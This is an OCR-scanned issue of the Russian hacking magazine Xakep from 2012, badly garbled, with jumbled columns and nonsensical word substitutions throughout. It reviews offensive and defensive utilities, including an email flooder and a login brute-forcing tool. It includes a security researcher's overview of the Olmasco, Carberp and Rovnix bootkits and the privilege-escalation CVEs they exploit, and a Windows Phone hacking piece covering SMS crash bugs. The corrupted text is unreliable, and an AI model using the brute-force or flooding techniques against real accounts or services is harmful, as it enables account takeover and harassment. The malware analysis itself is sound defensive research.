обнов л е н ие б а зы си гнат ур ;

0.

0.

Radmin Vieweг.

Уд а л енное на ыключение колтун п ьютеров. Эт а

Автор рекоме н задувает заключать ото

000 давно 000

сервиса. Файл не без; аккаунтами долженствует име т ь внешность :

И нт ервал флуд а от в отношении дн ого мейла поезд л яет пример н по отношению что касается д неужли ми н уту, п оэ т ому соз д ате ль п ро­

просмотр д да р екторий.

функ ц ияслужитд л мы выключениялюбо г касательно

граммы рекомендуе т рабо т а т ь вместе с ней из д е д ика,

РЕ

удаленного компьютера либо — либо г руnпы килоом п ью ­

эдак во вкусе присутствие этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

0.

получи ла т равным образом н равно ц е. По дд ер­

Б ыс т рое просматривание сети. П ро га осу щ ест­

TaskVieweг:

работа дампов

0.

020 симво л ов

0.

Функция

Wake-On-LAN.

шая живость флуд а. Из удобс т во D eath-MoЬile Эта связка п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет охватывать хуй аленный комnьютер да л равно

действий [действие, факс телефона, мыло!,

редактирование 0 05-заголовка;

гру п пульт килоом п ью т еров, даже если они поддержива ­

а равным образом лог, во котором фиксируется, какие

подпора да во что касается г об фасон т а РЕ + [64Ьitl;

надстройка функцию Wake - On - LAN.

сведения доставле н ы, а какие неграмотный дошли

Интуитивно общедоступный ан т ерфейс равным образом довольство

прежде а д ресатов. Остальные фичи п рограммы твоя милость

просмотриредактированиетаблицимпорта/

ис п ользования сканера моя особа советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

уток самостоятел ь но.

вместе с н ей .

исправление

CRC;

ХАКЕР

03/158/ 0012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

01cJ1o ПОТСIКО8:

00

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 0111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

равно сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

что до ~ТЬСА011еН&N9 01

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 011.ет :

~~От 0 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как прямо изо на­

звания, буква тулза предназначена

доменов на различных форматах;

с целью поиска свободных доменных

может из ть продлить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога конкретно никак не поможет

дальше, а впоследствии с выгодой п родать

теб е зарегистрировать la затем и продать! какой-либо viagгa.

н уждающимся! Та кже дозволительно создать хороший SЕО-шоп возьми хорошем до­ 81

мене- вариантов бог не обидел

05

Qст,апосъ:

021

Всего :

002

com, да

.

в некоторой степени подобное подогнуть

кардинально правдоподобно . Наприме~ вишь

Основные внутренние резервы программы:

0

Ouo<&oo:

~ nн6о 0 нnн 0 ОМ!ОМ ,a,b,t

Name

Их денно и нощно не запрещается спрятать по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую к домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 0*21 ...}·

0 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс ради поиска а -т по отношению слыхать

ных шаблоном на стиле регулярно­

xakepviag га .com: [а -zH5, 0}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

08Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- сие

программа, предназначенная

в целях автоматизации

GET-

равным образом РОSТ-эапросов .

Соответственно, может применяться в целях

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга равным образом т. п. Во всех полях программы lза исключением п олей Data равно U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - пропуск , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль во mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - маркер брута. В коде, полученном в дальнейшем запроса от токе­ нам, осуществляется розыск указанной строки.

На тему безопас н ого стирания данных велось

хотя жуть нужная программа. Она проел у шива­

ее равным образом отрекомендовать тебя со дежурный тематиче­

ет мало-мальски сотен портов [указанных во обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир грин т

Files Тегm i паtог.

Эта

у т илита обеспечи вает гласность

реальность держи ни х уязвимых сервисов равным образом анализи­

твоих данных, без остатка удаляя приватные

рует до сей времени подключения сообразно сим портам.

д окументы, изображения, ви д ео да отдельные люди фай­

Эта конспект во основном предназнач ена ради

лы хорошенечко перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

поиск портов помогает установить характер

их начинка малость раз в год по обещанию перезаписы­

операционной системы равно обнаружи ть потен­

вается случайными данными равным образом предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

другими словами web-cepвepl . Посл е сканирования портов

нов равно ть сии файлы хорош нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

конспект позволяет <<очистить>> свободное

давая тестовые требования да анализируя его ответ.

место вместе с через сложных алгоритмов

Утилита

шифрования, к того дай тебе навечно

ипозволяетоднозначноустановитьфактатаки. Кроме этого, обслуживающая программа может заниматься ся про

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет бери выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины равным образом парали

во виде пick;pass берутся изо одного файла.

0.

Режим двух файлов: логины отд е льн о, паро­ л да отд ельно.

З.

Режим цикла: пакет сработаетука­ занное наличность однажды без участия использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит размен не без; атакующим

перевести хоть те файлы, которые доселе

разве нужно, п осле Х следующих этим волов! и выполняется впредь до коне ч утнапиштим строки !ча щ е всего она состоит изо символа< сиречь «1. Прога имеет

0.

APS [Aпti Ро г t Scaпneгl- сие маленькая,

поуже полно разговоров, хотя автор этих строк хочу удлинить

Счи т ывание н ачинается за единый вздох затем н ее !или,

три режима:

Вlдl•аное

-

0.

П севдослучайный.

0.

Британский ,

З.

Случайный.

0. 5.

Р оссийский, ГОСТ Р50739-95.

0220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

отладка сканеров портов равно оборона верка

что до

отлаживание файервола равным образом недействующий

насчёт

закрепление сетевых червей;

об

отладка антитроянских да антивирус­

сетной безопасности;

HMG 055.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

запирание троян скихпрограмм,пере­

численных на базе.

075


Матросов Санюта , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 0011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март сего года- самое правильное минута для подведения итогов годы прошлого. Ну, самостоятельно понимаешь: новогодние отпуск уж позади, по майских

Load MBR

праздников до этот поры далеко, единица светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

0

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

по части

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

0. Схема

загрузки буткита

driver , ___________ ,1


Веселая триада буткитов

Рис . З . Модифицированная

VBR в зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

0. Раздел пользу кого

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т лорнет з р ения развит_ия на ре д по части н осного относительно гр аммнаго обе­

ядра да используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши равно го д не запрещается отозваться вроде годик

го б у ткитсстроения дозволяется инсценировать во виде схемы , представлен­

развития 04-битных буткито во . Е сли на

утнапиштим получай рис.

0010

году ми был

известный едва что до д ан бу т полосатик д ля 04-бит н ых систем- Win64 /0imaгik

0.

Здесь отображены сугубо значимые моменты во вкусе на развитии

ITD L41, ведь во этом году да мы от тобой п в отношении л учили интересн ы й запах изо Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный в духе MaxSSI. И сие т что до л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI либо — либо непохожий после г рузочный код, что касательно т рабатывается

защи т ные мягкая рухлядь н измы пр относительно на ерки ц иф р овой лещадь п иси д ля мо д ульишко

до этих пор накануне основные принципы инициализации операционной системы, вредонос-

Р об С-реализаций, что-то около равным образом на воплощении сих технологий на боевых вредоносных программах. Заражая нагрузочный директриса движение ко ого


Рис.

0. Функция загрузки файла с скрытой файловой системы- Olmasco

получи мы проект может произвести сличение по-над загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, дабы переместить модификации во нынешний

Итак , суп луг за технологичности занимает

процесс.

риск интересна во первую кортеж тем, почто модифицирует

Именно сии модификации на дальне йшем позволяю т обходить механизмы проверкицифровой подписи равно обманывать вредоносные

Эта

VBR [Volume Boot Recoгdl да имеет полноценную собственную файловую

систему ради хранения дополнительных модулей равно других ком­

драйвера во деамбулаторий защитных механизмов. Но начинать во всяком случае вер­

понентов. Как выглядит модифицированная

немся для нашему хит-параду сложных угроз, тем больше в чем дело? их спектр

системе, показано получай рис.

действ равным образом тельно аспидски широк.

Dlmasco.

VBR

нате зараженной

0.

Большинство антивирусных продуктов научились действенно

В прошлом году суп полоса нашег по отношению рейтинга занял Stuxпet,

справля ться от активным заражением буткитам и, использующими

а на одном с последних номеров пишущий эти строки сейчас описывал машины рабо­

модификацию

твоя милость Duqu [обнаруженного в осеннее время младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже про противодействия антивирусам .

MBR.

Однако злоумышленники форвард дальше, а точ­

держи данный крата ему безвыгодный уготовлено попасть во отечественный рейтинг, где-то наравне львиная

Это вызвало у некоторых антивирусных вендаров определенные

порция используемых им технологий уж знакома нам сообразно червю

сложности, во результате аюшки? злоумышленники получили возмож­

Stuxпet [хотя, коли бы авторы проплатили рекламное луг во жур­

ность оста ваться незамеченными во системе. Ус тройство внутрен­

нале «Хакер>>, наш брат бы поместили их существо нате во-первых пространство :11.

ней файловой системы равным образом заслуживает отдельной статьи.

Duqu

разработан нате основе праздник а самой программн ой платформы.

Из его Запомнившихея особенностей целесообразно отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается настоящий раздел, во котором

размещаются постоянно компоненты буткита [рис.

01 .

Файловая концепция хра нит сезон да дату создания файла равно хоть

интересах загрузки вредоносного заключение на костяк равным образом повышения привилегий,

контрольную сумму для того проверки целостности. С точки зрения

однако сие сейчас содержание в целях отдельной статьи ;l.

технологичности буткит вместе с этой файловой системой вследствие ее


Веселая тр ойка буткитов

структуре превосходит по сию пору иные угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе возьми получи рис.

0.

Функция загрузки фай ла с скрытой файловой системы в руткит-драйвере представлена получай рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

0.

Так что шофер написан для чистом С не принимая во внимание обфускации, нам уда­

рогач декомпилировать ко д драйвера возле помощи

IDA

да

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

равно таким обраЗ'ом возбудить его структуру. Не больше интересен равным образом работа модификации системы изумительный сезон

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т через порядочно запутанный процес из проиллю ст рирован на рис.

0.

Д ополнительно нужно пометить равным образом ведь , что-то

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

вроде равно

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе район по части праву занимает обно вленная видоизменение СагЬегр, ко­ торая обзавелась порядочно любоп ытным буткит-функционалом.

Именно симпатия отвечает вслед за отладку ядра быть правая рука по отношению суп WiпDbg, а после ее модификации настройщик неграмотный может пристроиться для системе с целью

СагЬегр весь не возбраняется охарактеризовать никак не всего только одной с самых техно­

удаленной отладки. В итоге вариантов остается малограмотный в такой мере много: либо

логичных, однако равным образом самой жадной вредоносной программой прошлого

иссле д овать весь мо д ули во статике [в случае буде их ранее посчастливилось

года. Этот бутки т атакует заместитель олее извес т ные дистанционные

извлечь изо скры пирушка файловой сис темы] , либо прилагать усилия во ернуть

сис тем ы курс на ско го обс л уживания, только р ечь безотлагательно невыгодный об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

равным образом помещать вредо н осный программа вр у чн ую.

Исследовать функцио наличность бу т кит-части равно как отнюдь не та к-т насчёт просто,

котор ый во нача ле годы д оставил нема л по отношению хлопот пользователям

так на этом нам поможет эмулятор

рунета. СагЬегр равным образом Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs равным образом отладка из IDA Рго.

системы бери самой

мация относительно продаже которого неоднокра т а во стреча лась получай разны х

получил суп поле следовать технологичность соб­

кибе ркрим ина льных форума х на начале пр ош лого го ей-ей .

ственной файловой системы равным образом характеристический станок буткита , который использует ря д наработок изо

TDL4 да

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" по части г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 03h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

0.

Bootmgr is loaded апd executed

имел лишь только функционал на пользова­

от бутки в таком случае м. В процессе анализа свежих дропперов ми попались

после расчёт нестандартных системных модификаций .

mЬг

Carberp

тельского режима, же прошлей осе нью были создан ы модификации

затрудняет врачевание

Read bcd

Процесс модификации системы нет слов срок загрузки- Olmasco

0. Покупайте наши буткиты!


Р ис.

00. Д е ко м пилированны й

для од , отв е тс т на е нны й следовать вот как сплуатацию у автор этих строк звимастей -

сверху тараньки любопытные строкавые константы изо сделано распакованного

установщика [рис .

Рис.

Carberp

01 .

01 . Снятие х уков

равным образом спnайсов от системны х функций во исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки приёмом наве л равно нас получи и распишись мысли насчёт системных модифи ­ кациях, производимых буткитом. Н по части дай снача л а погово р им о дропп е ре, который-нибудь охватывает общий связка зксплойтов ради повы­ шения привилегий. В первую хвост их присутствие свя з ано от тем ,

Д еком п илированный код, эксплуатирующий уяз во имос т и, п ри­ ве д ен возьми рис.

0О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра автор на ля ­

ась? интересах установки буткита требуются льготы администрато-

ется со н ятие различ н ых хуков равным образом сплайсов от некотор ы х систе мны х

ра не так — не то системы. У корпоратив н ых пользователей [а вот поэтому и есть они

ф у нкций переднепосредствен н ым из-за п уском бу т ки т- губы н овщика

являются целью злоумышленнико в! , имеющих д оступ ко ДБ О, может

[ ри от .

п росто безвыгодный присутствовать п р ав бери запускание ис п олняемого файла от высокими

011.

Это своего рода патрулирование различных п есочниц равным образом сре д вместе с т на мони ­

п ривилегиями, да мето д ы социальной инженерии тогда еще малограмотный по­

торинга, которые ис п ольз у надстройка хуки во пользо во ател ь ском режиме.

могут. П озтому неотложно обычай н овщик эксплуатирует хорошо крат н ых

В процессеработы буткит-части на обхо д живое золото н измо на ради во ерки

уязвимости про п овышения локальных рядом на илегий на сис т еме:

М 010-073

lwin32k.sys Keyboaгdlayout vuln l; М 010-092 [Task Scheduleгvu l n);

численный сообразно д писи равно других средств из-за щ равно твоя милость з а гружае т от моя персона вр е ­ д онос н ый драйвер. За д ач е й сего драйве р а мы вл яется на никак не др ение полезной нагрузки на адре не без; н ое пространс т умереть и невыгодный встать u sе г-m оdе-процессов . Д что касается сего испо л ьзовались методы внедрения во по части ль зо во а т е ль ском

р ежиме, такие ка для N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр помогите т оит с трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, равно dll-модул мы , на н ед р яемо г по части др айвером в п ользова т ельском режиме. Странно, зачем единожды ра потому что тчи ки никак не ис ­ пол ь зовали всегда возможнос т и, которые им пре д ос т авл мы ет загру ­

женн ы й ко д н а уро на безграмотный ядра системы . В се перехваты системных функ ц ий губы н авливаю т ся сейчас во малограмотный д ре н ным мо д правовед во в соответствии с л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

иначе говоря

RKU.

СагЬе г р получил блюдо полоса вслед техноло г ичность, та для вроде з т в отношении


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

0 1

'

Real mode

r-----

---------- Win 0000·------------ •

0

LoadVBR

0

Real mode

WinXP r - - ...

' ',

>< ·с:

>

что касается

0

,

.

Load bootstrap code

0:::

0

success

,

~

fail

с:

~

0

real mode 0protected mod

0

'

Determine 05 Digit Capacity

Load bootmgr

0

0 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 0protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

0

0 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

02. Заражение системы

буткитом

.,

.

real mode 0protected mod

' '

Self Delete and Exit

Рис.

Rovnix

основной банковский буткит, который-нибудь результат ивн по части работает ко ак

во х86·, та для равным образом во х64-сис тем ах. В

0012

Load kernel and boot start drivers

г насчёт д у, автор этих строк госдума ю, наш брат снова безграмотный разок

Итого, Rovпix стал п ервой угрозой, объединение казав ш ей неэффектив­ ность многих антивир усных пр что до д ук тов , которые проверяли целост­

ность лишь

услы шим об этой вредоносной пр ограмме.

03. Загрузка Rovnix

MBR.

В итоге градиент атаки, используемый буткита ми,

стало без малого неисчерпаемым, все еще единство си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется получи и распишись поздних этапах загрузки системы . По сути,

Треть е п оче т ное поле нашего хит-парад а занимает Rovпix,

в ту же минуту систем а загр ужае тся всегдананедоверенной платформе.

ко т относительно рый первым стал испо льз что до вать модификацию областей за­

Возможно, методика SecuгeBoot исправит эту ситуацию во WiпB ,

грузочного кода, касательно тличног об ото

так сие полноте снова невыгодный спешно .

проиллюстрирован возьми тускарора .

MBR.

Процесс заражения системы

02.

Как различимо изо б л ок - схем ы , во процес се заражения, ради исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, в отлучке нуль необычного.

В этом году во нашем хи т-параде самых технологичных у гр эскер

B oo tstгap- э ведь ча ст ь загрузчика, которая отрабатывается разом

присутство вались вр едонос ны е пр по части гр аммы, имеющие непохожий

п ос ле инициализации VBR IVol ume Boot Recoгd], н в рассуждении п еред загруз­

буткит-фу нкционал равно со дер жа суп е скрытые файлов ые системы.

который сис темног относительно bootmgг. Именно сие да позволяет опосля

Всё сие во первую очере дь пр извано скрыва ть вредоносные п ро­

не осталять без влияния возьми загрузку системы. Ro v пi x, в духе равным образом

граммы по части т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у на х ран ения своих компонентов равным образом по­

активного заражения да обременять произведение криминалистиче­

сле д ую щег в отношении д оступа ко ним возле помощи буткит-ко ага , но, на отли ч ие

ской экспертизы. В наступившем году попроще пробывать невыгодный станет, равным образом ваш покорный слуга

касательно т файловой системы

думаю, в чем дело? многие с описанных во этой статье векторов сделано себя

Olmasco,

симпатия устроена хватит незатейливо ,

ведь есть, п по части сути, представляет на лицо без затей зона диска , во кото­

исчерпали да во нашем следующем хит-параде, если угодно , появятся

рую записаны данные, равным образом отнюдь не имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ан цип е, на описы ваем ом вместе с л учае сия облас ть от д анными нужна

процессоров, такие как бы многаядерность равным образом аппаратная вирт уализа­

просто-напросто в целях того, воеже на проце ссеработы буткит был в силах почувствовать

ция . Но от точки зрения реальных угроз сие что всего лишь во слу­

необходимые компо ненты да сменять ими касательно р игинальные п ри из-за ­

чае их рентабельности, поскольку, на правах показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- очень прагматичный народ. :Х:


MALWARE

Юраша «yurembo» Язев

ь

интересах мобильных

lyazevsoftldgmail.coml

-

Чтобы разработать

предмет класса

MediaEiement (nроизводным от него является

спинар mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то на нашем журнале работает будет фанатов винды, как например ваш покорнейший слуга

alias отечественный редактор, ученый Лозовский . К счастью, дьявол ужас обижен тем фактом, что такое? MS сверх меры долготно тянула со обновлением его любимой WM6.5, и вследствие чего поручил ми испытно разобраться, наравне во новой системе обстоят картина из малварью равным образом уязвимостями. Вперед!

нужно на ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы что до хаках WP

0-7.5.

На диске находятся

три nроекта,

построение которых описана во статье .


Мал во арь дл автор этих строк моби льн ых <<окошек>>

rn

в отношении недавнего време н равным образом на стане

WP бы л что до дос т аточно спокой Windows Phone 0.5

.

но, хотя на середине декабря получай п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

как крупа на голову был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, на результа т е которо г о, п осле получе н ия специал ь а перед г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , круг обязанностей ото п равки да чте н ия эсэмэсок перестает работат ь . Тако го но эффек т а мож н насчёт д оби т ьс моя особа , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

0

А известие , писатель которо го дано во т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

0&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое доклад изо социал ь утнапиштим се т равным образом [ н апример, с Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро на ать безвыездно функции телефона! Этот ба г- далеко не новинка на мире мобильных устройств, на свое на ремя им как и работа л да да айфо н ы, и андрои д ы .

Ес л да малограмотный доставать изумительный во н има ни е п осле д ний рассмо т ре нны й э 14 зод , т по части

текущий ба г малограмотный таково быстро равным образом критичен, особенно соответственно срав н ению вместе с СМС - атакой

Реда ко тируем словник

для айфон, которая позволяет атакующему заразиться п олный кон т роль над устройством. П ользова т ели практически д рои д ев в свою очередь были на опасности: << СМС-смерть» выкидывала таксофон во офлайн или, аюшки? ажно хуже,

Parameter равным образом еще после

предоставля л а атакую щ ему соответственно лн ый дос т у п для системе .

ви на единицу, PortaЫe D eviceNameSpace E xclude F romShell- во нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - на е д ини цу.

В настоя щ ее во р ем аз многогрешный с << т рех ко ит ов>> исключительно

WP 0 уязвима д л я 2012-rol, обновле ния , Microsoft во последнее времена

СМС-атак . Когда п да сались сии строки [я нв арь устраняющего текущий галлюцинация , вновь отнюдь не было.

измени следующие ключи:

Использо во а т ь

WP 0 как бы

модем минуя сnец равным образом аль н ых nриготсе л ений

т оже было нельзя. Н о, ко счастью , на

WP 0.5 сие

размолвка бы л об

изрядно почасту выпускает апдейты на своей мобильной оси , того

исправлено . Правда, последнее выражение всё в равной степени остается ради операто­

будем надеяться, в чем дело? ремонт последует архи резво .

пунш сотовой связи, да разве авиатариф далеко не п ре д назначен с целью расшаривгния интернета, ведь им п ридется nользова т ьс мы исключите л ь н в рассуждении получи и распишись конструкция н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем с обзоров чужих ха ко во ко реализации собстве нн ой жмет вари.

безграмотный единодержавно крат кракнуть систему, поз т ому наша сестра рассмотрим только лишь некото ­

рые изо сих ха ков, самые ваша милость д ающиеся равно общест на енно полезные.

Несмотря в то, чт по отношению WP на целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, равно как у Мальчи ш а - Кибальчиша,

:1

хватит самобытно д ля

Как известно, с тем разлечить образование лещадь управлением необходимо прошествовать утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 0, в Windows

глотать тайные ходы, равным образом их безвыгодный спать .

равным образом кроме следовать пл а т равно т ь

тов>>. Однако умельцы изо

09 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения к

WP выполняю тся

сообразно д

.NET на

ок р ранее н ии

Silverl ight.

Это значит, в чем дело? н ам н ичего безграмотный придется nиса т ь от нуля да дозволено буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила равно как безграмотный бесплатна, только вслед нее присутствие д ется спустить несравни­

API.

П роще лишь отправи ть

SMS

для одноплатный

номер. Так черт из ним нате ш е <<nолезное>> присовокупление -де л ае т сие приёмом

мо в меньшей степени - девять <<nрези дентов>>. Она кор р ектно функционировала

со временем запускаl Д ля того с намерением не запрещается было обрабатыва т ь перипетии

исключительно держи

жизненного цикла приложения, необходимо ввести следующее ради ­

WP 0,

а приближенно на правах

Mango MS

пофиксила ба г во

ис п ользова л а nрограмма, в таком случае теп е р ь ути л а

WP 0.5, который от Chevro nTeam никак не работа­

странство име н :

ет. В принципе, очищать е щ е сам д а д айский из п особ разб л окироват ь устройство для того запуска сторо н них п риложений. Дл ваш покорнейший слуга каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя симпатия из во ой, состав действий, необходимых к преимущества

цели, равно как различается. Как говорится, Гугл во помощь!

:1

Кроме того, следует примолвить площадь имен Microsoft.Phone. Tasks, с тем работ ать не без; SMS да мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> никак не имеет доступа

работчик события, во вал н икаю щ его пр равно заг р узке приложе н ия:

ко файловой сис т еме смартфо н а. П по отношению д ко л ю ч е нн ое уклад невыгодный ото­

бражается во Эксnлорере по образу д в отношении п в рассуждении лн равно тель ны й диско во ый н акоnи т ел ь, но сие мелочёвка исправить. Сnер на а отключидевайсот компьютера для того

protected override void

чистоты эксперимента, открой вычитчик реес т ра, разверни раздел

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, дале открой ее материнскую на етку Device

